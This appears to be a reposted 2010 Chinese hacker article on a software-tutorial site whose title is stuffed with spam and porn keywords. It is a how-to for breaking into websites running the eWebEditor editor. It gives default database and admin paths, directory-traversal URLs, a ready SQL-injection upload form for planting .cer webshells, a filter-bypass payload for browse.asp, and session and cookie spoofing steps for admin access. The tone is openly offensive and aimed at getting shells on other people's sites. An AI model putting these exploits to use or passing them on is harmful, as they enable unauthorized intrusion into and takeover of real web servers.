狠狠色丁香婷婷综合尤物/久久精品综合一区二区三区/中国有色金属学报/国产日韩欧美在线观看 - 国产一区二区三区四区五区tv

LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

目前所有ewebeditor版本入侵的漏洞與問題總結(jié)

admin
2010年8月13日 10:19 本文熱度 5552

轉(zhuǎn)載請(qǐng)注明Minghacker's


Ewebeditor編輯器目前分為asp,aspx,php,jsp四種程序,各類ewebeditor版本很多,功能強(qiáng)大頗收使用者喜愛,在國內(nèi)使用極為廣泛。于是像windows一樣被黑客們挖掘出很多漏洞,大家莫急,筆者M(jìn)inghacker總結(jié)前人基礎(chǔ),一一道來。


對(duì)于目前asp版本的ewebeditor編輯器漏洞主要分為以下7點(diǎn):


默認(rèn),遍歷目錄漏洞,一句話,注入,構(gòu)造,cookie欺騙,社工(踩腳印入侵),


NO1.ewebeditor編輯器一般默認(rèn)數(shù)據(jù)庫路徑是db/ewebeditor.mdb
默認(rèn)的后臺(tái)路徑是admin_login.asp
建議最好檢測(cè)下admin_style.asp文件是否可以直接訪問


舉例:














數(shù)據(jù)庫SouthidcEditor\Datas\SouthidcEditor.mdb


沒登陸頁面。


利用方法:PopUp.asp頁面?zhèn)鲌D片小馬,nc提交,得shell



NO2.遍歷目錄漏洞(具體如下):
登陸編輯器---上傳文件管理---選擇樣式目錄(隨便選一個(gè)目錄)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整個(gè)網(wǎng)站文件了
此漏洞危害大大的,絕對(duì)恐怖



NO3.當(dāng)數(shù)據(jù)庫被管理員修改為asp、asa后綴的時(shí)候,可以插一句話木馬服務(wù)端進(jìn)入數(shù)據(jù)庫,然后一句話木馬客戶端連接拿下webshell



NO4.有的時(shí)候爆了數(shù)據(jù)庫找不到后臺(tái)地址讓人發(fā)急,其實(shí)可以試試查看樣式表,有沒別人加入的asp、asa后綴樣式表,也就是雖說的踩著腳印入侵。
還有的時(shí)候聰明的管理員也就是加“#”不妨社工試試,我可沒少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb



NO5.注入2.1.6的注入就不多說了,如下保存為html文件修改action,直接上傳cer馬


<H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>




     ewebeditor 5.2 列目錄漏洞


出現(xiàn)漏洞的文件存在于ewebeditor/asp/browse.asp


ASP/Visual Basic代碼
Function GetList()
Dim s_List, s_Url
s_List = ""
Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
'Response.Write sCurrDir
'On Error Resume Next
Set oFSO = Server.CreateObject("Scripting.FileSystemObject")
Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir))
'注意一下sCurrDir變量,這個(gè)值等下我們可以用到
If Err.Number>0 Then
s_List = ""
Exit Function
End If


If sDir <> "" Then
If InstrRev(sDir, "/") > 1 Then
s_Url= Left(sDir, InstrRev(sDir, "/") - 1)
Else
s_Url = ""
End If


s_List = s_List & "" & _
"" & _
".." & _
" " & _
""
End If
'Response.Write sDir&"!"&s_List


Dim oSubFolder
For Each oSubFolder In oUploadFolder.SubFolders
'Response.Write oUploadFolder.SubFolders
If sDir = "" Then
s_Url = oSubFolder.Name
Else
s_Url = sDir & "/" & oSubFolder.Name
End If
s_List = s_List & "" & _
"" & _
"" & oSubFolder.Name & "" & _
" " & _
""
Next
'Response.Write s_List


Set oUploadFiles = oUploadFolder.Files


For Each oUploadFile In oUploadFiles
'Response.Write oUploadFile.Name
sFileName = oUploadFile.Name
If CheckValidExt(sFileName) = True Then
'這行讓人有點(diǎn)郁悶,檢測(cè)了所有允許的文件后綴,如不允許就無法列出,不然就不只列出目錄名和圖片文件了
If sDir = "" Then
s_Url = sContentPath & sFileName
Else
s_Url = sContentPath & sDir & "/" & sFileName
End If


s_List = s_List & "" & _
"" & FileName2Pic(sFileName) & "" & _
"" & sFileName & "" & _
"" & GetSizeUnit(oUploadFile.size) & "" & _
""
End If
Next
Set oUploadFolder = Nothing
Set oUploadFiles = Nothing
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url


If sDir = "" Then
s_Url = ""
's_Url = "/"
Else
s_Url = "/" & sDir & ""
's_Url = "/" & sDir & "/"
End If


s_List = s_List & ""
s_List = HTML2JS(s_List)
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
GetList = s_List
End Function
'如果沒有下面這步檢測(cè)的話,應(yīng)該就可以列出目錄中所有的文件了,有點(diǎn)郁悶..現(xiàn)在只能列出允許后綴的文件和目錄名
Function CheckValidExt(s_FileName)
If sAllowExt = "" Then
CheckValidExt = True
Exit Function
End If


Dim i, aExt, sExt
sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
CheckValidExt = False
aExt = Split(LCase(sAllowExt), "|")
For i = 0 To UBound(aExt)
If aExt(i) = sExt Then
CheckValidExt = True
Exit Function
End If
Next
End Function
'我們順著代碼往下找,發(fā)現(xiàn)sCurrDir的值是通過下面的值得到的
Sub InitParam()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))


Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), "|||")
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next


If bValidStyle = False Then
OutScript("alert('Invalid Style.')")
End If


sBaseUrl = aStyleConfig(19)
'nAllowBrowse = CLng(aStyleConfig(43))
nAllowBrowse = 1


If nAllowBrowse <> 1 Then
OutScript("alert('Do not allow browse!')")
End If


sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <> "/" Then
Select Case sType
Case "REMOTE"
sUploadDir = "../../" & sUploadDir & "Image/"
Case "FILE"
sUploadDir = "../../" & sUploadDir & "Other/"
Case "MEDIA"
sUploadDir = "../../" & sUploadDir & "Media/"
Case "FLASH"
sUploadDir = "../../" & sUploadDir & "Flash/"
Case Else
sUploadDir = "../../" & sUploadDir & "Image/"
End Select
End If
'sUploadDir =sUploadDir &"/"


Select Case sBaseUrl
Case "0"
'sContentPath = aStyleConfig(23)
Select Case sType
Case "REMOTE"
sContentPath = "../" & aStyleConfig(3) & "Image/"
Case "FILE"
sContentPath = "../" & aStyleConfig(3) & "Other/"
Case "MEDIA"
sContentPath = "../" & aStyleConfig(3) & "Media/"
Case "FLASH"
sContentPath = "../" & aStyleConfig(3) & "Flash/"
Case Else
sContentPath = "../" & aStyleConfig(3) & "Image/"
End Select
Case "1"
sContentPath = RelativePath2RootPath(sUploadDir)
Case "2"
sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select


Select Case sType
Case "REMOTE"
sAllowExt = aStyleConfig(10)
Case "FILE"
sAllowExt = aStyleConfig(6)
Case "MEDIA"
sAllowExt = aStyleConfig(9)
Case "FLASH"
sAllowExt = aStyleConfig(7)
Case Else
sAllowExt = aStyleConfig(8)
End Select


sCurrDir = sUploadDir '注意這里,這個(gè)是得到了配置的路徑地址
sDir = Trim(Request("dir")) '得到dir變量
sDir = Replace(sDir, "\", "/") '對(duì)dir變量進(jìn)行過濾
sDir = Replace(sDir, "../", "")
sDir = Replace(sDir, "./", "")
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & "/"
'重點(diǎn)就在這里了,看到?jīng)]有,當(dāng)sUploadDir & sDir存在的時(shí)候,sCurrDir就為sUploadDir & sDir的值了
'雖然上面對(duì)sDir進(jìn)行了過濾,不過我們完全可以跳過.具體利用st0p會(huì)在下面的利用中給出
Else
sDir = ""
End If
End If


End Sub



嘿嘿,看到這你應(yīng)該明白了,其實(shí)就是對(duì)dir過濾的問題,我們完全可以構(gòu)造特殊的值來跳過驗(yàn)證,這樣就可以得到目錄結(jié)構(gòu)和顯示設(shè)置文件中允許的文件后綴的文件了..
利用方法如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
由于st0p測(cè)試的時(shí)候,上傳目錄是根目錄下的uploadfile,通過上面的地址就可以得到根目錄下的所有目錄了.
嘿嘿,如果你發(fā)現(xiàn)打開的時(shí)候顯示的是空白,不要灰心,這就對(duì)了,直接查看源代碼,看到了嗎,里面就有你根目錄的目錄名字了.
嘿嘿,他根目錄下有個(gè)guest目錄,我們通過下面的地址可以列出他下面的結(jié)構(gòu)
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/guest
然后我們也可以通過
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/../…././/..
可以往更上層跳,我測(cè)試的那個(gè)虛擬主機(jī),得到的是www,logfile,datebase這三個(gè)目錄.


   eWebEditorv5.5asp存在session欺騙漏洞!
記得以前eWebEditor在線編輯器有個(gè)session欺騙漏洞沒想到5.5版本也存在!


代碼如下:


'登錄檢查
Function ChkLogin()
If session("editor_admin")="" or IsNull(session("editor_admin")) Then
     PhilLogin()
   session.CodePage = session("PreCodePage")
   response.End
End If
End Function


呵呵很明顯和以前的版本漏洞一樣!


只是判斷了session.


利用方法:


新建立個(gè)hkok8.asp內(nèi)容為


<%Session("editor_admin") = "admin"%>


然后訪問hkok8.asp 最后訪問登陸文件.刷新ok進(jìn)去了...


要進(jìn)行這種Session欺騙,必須有三個(gè)前提:


1.進(jìn)行欺騙的網(wǎng)頁和被欺騙的網(wǎng)頁必須位于同一個(gè)網(wǎng)站內(nèi).
2.必須知道管理頁面。
3.必須知道Session變量以及它的限制條件。


    php版ewebeditor 3.8的漏洞


php版本后臺(tái)是調(diào)用../ewebeditor/admin/config.php,大家去看下源碼就知道,在這里我說說利用方法:


1 首先當(dāng)然要找到登陸后臺(tái),默認(rèn)是../eWebEditor/admin/login.php,進(jìn)入后臺(tái)后隨便輸入一個(gè)用戶和密碼,當(dāng)然會(huì)提示出錯(cuò)了,必須是出錯(cuò)的時(shí)候,然后這時(shí)候你清空瀏覽器的url,然后輸入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回車,
2 然后輸入正常情況才能訪問的文件../ewebeditor/admin/default.php就可以進(jìn)后臺(tái)了


3 后面的利用和asp一樣,新增樣式修改上傳,就ok了


測(cè)試一下asp 2.8版本的,竟然一樣可以用,爽,看來asp版的應(yīng)該可以通殺(只測(cè)試2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在瀏攬器輸入javascript:lbtnUpload.click();就能得到shell
jsp的上傳漏洞以及那個(gè)出了N久了,由于沒有上傳按鈕,選擇好要上傳的shell,直接回車就可以了


該文章在 2010/8/13 10:19:21 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲(chǔ)管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved